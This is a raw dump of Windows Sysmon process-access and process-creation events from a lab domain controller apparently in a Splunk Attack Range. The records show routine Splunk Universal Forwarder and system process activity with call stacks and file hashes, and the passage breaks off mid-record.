|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000013901Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:12.375{08A6967A-4753-6000-0D05-000000009A01}11165564C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+21886|C:\Windows\System32\TokenBroker.dll+1ac23|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000013918Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.922{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4983-6000-7805-000000009A01}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013917Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.922{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013916Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.922{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013915Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.922{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013914Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.922{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013913Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.922{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4983-6000-7805-000000009A01}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013912Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.922{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4983-6000-7805-000000009A01}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013911Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.922{08A6967A-4983-6000-7805-000000009A01}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013910Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.250{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4983-6000-7705-000000009A01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013909Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.250{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013908Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.250{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013907Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.250{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013906Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.250{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013905Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.250{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4983-6000-7705-000000009A01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013904Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.250{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4983-6000-7705-000000009A01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013903Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:15.251{08A6967A-4983-6000-7705-000000009A01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013927Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:16.484{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4984-6000-7905-000000009A01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013926Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:16.484{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013925Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:16.484{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013924Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:16.484{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013923Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:16.484{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013922Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:16.484{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4984-6000-7905-000000009A01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013921Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:16.484{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4984-6000-7905-000000009A01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013920Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:16.486{08A6967A-4984-6000-7905-000000009A01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013919Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:16.078{08A6967A-4983-6000-7805-000000009A01}4832724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013936Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:17.656{08A6967A-4985-6000-7A05-000000009A01}68523132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013935Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:17.500{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4985-6000-7A05-000000009A01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013934Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 